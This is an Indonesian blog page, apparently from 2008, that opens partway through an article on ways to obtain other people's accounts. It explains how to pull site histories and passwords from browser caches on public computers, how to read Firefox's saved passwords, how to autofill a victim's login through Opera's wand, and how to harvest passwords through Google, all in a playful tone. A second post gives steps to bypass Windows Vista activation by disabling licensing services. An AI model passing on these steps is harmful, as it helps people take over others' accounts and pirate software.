Coba anda buka folder tersebut, anda akan menemui file-file html & file-file gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa melihat lokasi file cache dengan menjelajahi menu Tools —> Internet options —> Settings

Lalu apa yang bisa didapatkan?? toh cuma file-file “sampah”?? Hmm… sekarang coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs apa saja yang telah diakses oleh oleh orang sebelum anda.

Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password dan dll. Banyak saya temui situs yang menyimpan password dan menampilkannya pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.

Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu.

Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools —> Options —> Security –> Saved password.

Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”.

Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya ;D (It’s fun enough.. ;)

Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!

[9]. Googling

Google.com. Banyak sudah situs yang runtuh, password dan nomor - nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;) Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas ;D

Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman bermain” anda akan diambil alih olehnya..

Penutup

Wew… ada banyak cara bukan untuk mendapatkan account orang lain?? So, selalu berhati-hatilah. Waspada selalu saat berada di tempat umum, bahkan saat berada di komputer pribadi anda sekalipun karena bisa jadi teman anda atau siapapun yang meminjam komputer anda memiliki tujuan yang kurang baik.

Sekian, semoga bermanfaat dan bisa menambah pengetahuan anda :)

Referensi

- securityfocus.com
- phrack.org
- spyrozone.tk
- google.com

mengcrack windows vista

2008-01-24T02:59:00.000-08:00

Saya akan memberitahukan cara Mengrack Windows Vista Final Release.
Tahapannya sebagai berikut:

klik bendera windowsKlik Rundan ketik Cmd.
setelah Muncul command prompt ketikan slmgr.vbs -dlv lalu tekan enter.fungsi dari perintah slmgr.vbs -dlv adalah untuk memeriksa Apakah Komponen Dari Windows untuk mengaktifkan Vistanya Berjalan.
klik bendera windowsklik Rundan ketik Services.msc,Cari software Licensing,dan pilih Disable di startup type.setelah itu Cari Ui Notification dan pilih Disable di startup type.setelah selesai klik close.
klik bendera windowsKlik Rundan ketik Cmdketikan slmgr.vbs -dlv lalu tekan enter. Setelah software licensing di disable dan juga UI notification, maka Komponen Windows Untuk Menjalankan Slsvc.exe Akan tidak jalan.

Catatanp:
Setelah Melakukan tahapan di atas yang perlu anda perhatikan adalah:

1. Anda tidak bisa Menjalankan Control Panel
2. Anda tidak bisa Menjalankan Properties kalau di klik kanan di desktop.
3. Anda tidak bisa Menjalankan Properties kalau di klik kanan di My Computer.

Tetapi jangan khawatir karena anda masih bisa menginstall Program baru. dan semua aplikasi windows seperti Windows Media player,dan lain-lain. masih bisa di jalankan.

Ok...Semoga bermanfaat dan selamat mengcrack Microshit Vista...ha..ha..ha...ha.....

dikutip dari :
Onno, 2007
Web Design & Programmer
farmindo SG, Wisesa-Consulting